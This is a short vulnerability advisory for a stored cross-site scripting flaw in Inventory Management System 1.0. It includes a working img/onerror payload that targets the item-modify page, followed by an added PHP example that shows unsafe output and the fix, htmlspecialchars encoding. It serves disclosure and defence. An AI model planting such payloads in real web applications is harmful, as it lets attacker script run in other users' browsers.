Inventory Management System version 1.0 suffers from a persistent cross-site scripting vulnerability.
## Title: Inventory Management System 1.0 XSS Stored
## Author: Hejap Zairy
## Date: 12.07.2022
## Vendor: https://www.vetbossel.in/inventory-management-system-php/
## Software: https://cutt.ly/lOZ8lrr
## Reference: https://github.com/Matrix07ksa
## Tested on: ArchLinux, MySQL, Apache
## Description:
Stored XSS, also known as persistent XSS, is the more damaging of the two main XSS types. It occurs when a malicious script is injected directly into a vulnerable web application, where it is saved and served to later visitors. Reflected XSS, by contrast, involves reflecting a malicious script off a web application onto a user's browser.
Status: CRITICAL
[+] Payloads:
```
https://0day_script.gov//Inventory_Modify.php
<img src=1 href=1 onerror="javascript:alert('HEJAP ZAIRY AL-SHARIF')"></img>
```
## Proof and Exploit:
https://streamable.com/4v5h6u
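
For defenders, the stored payload above stops executing once the value is encoded for the HTML context at output time. The following is an added example, not code from Inventory Management System or from the advisory's author; the field names (`item_name`, `quantity`) and the render functions are hypothetical, and the row is constructed in memory in place of a database record.

```php
<?php
// Added example: not code from Inventory Management System. The field names
// and both render functions are hypothetical.

// Constructed row standing in for a record saved through the modify form;
// item_name holds the payload shown in the advisory.
$row = [
    'item_name' => '<img src=1 href=1 onerror="javascript:alert(\'HEJAP ZAIRY AL-SHARIF\')"></img>',
    'quantity'  => '12',
];

// Vulnerable pattern: the stored value is concatenated into HTML unchanged,
// so the browser parses it as markup every time the listing is viewed.
function render_row_unsafe(array $row): string
{
    return '<tr><td>' . $row['item_name'] . '</td><td>' . $row['quantity'] . '</td></tr>';
}

// Hardened pattern: encode at output for the HTML context. ENT_QUOTES covers
// both quote styles; ENT_SUBSTITUTE replaces invalid UTF-8 instead of
// returning an empty string.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_row_safe(array $row): string
{
    // Numeric fields are validated rather than echoed back as text.
    $qty = filter_var($row['quantity'], FILTER_VALIDATE_INT);
    $qty = ($qty === false) ? 0 : $qty;
    return '<tr><td>' . h($row['item_name']) . '</td><td>' . $qty . '</td></tr>';
}

$unsafe = render_row_unsafe($row);
$safe   = render_row_safe($row);

// Report whether each rendering still contains a live <img> tag.
var_dump(strpos($unsafe, '<img') !== false);
var_dump(strpos($safe, '<img') !== false);
echo $safe, PHP_EOL;
```

Encoding belongs at every place the stored value is written into a page, since the record can be displayed by more than one view.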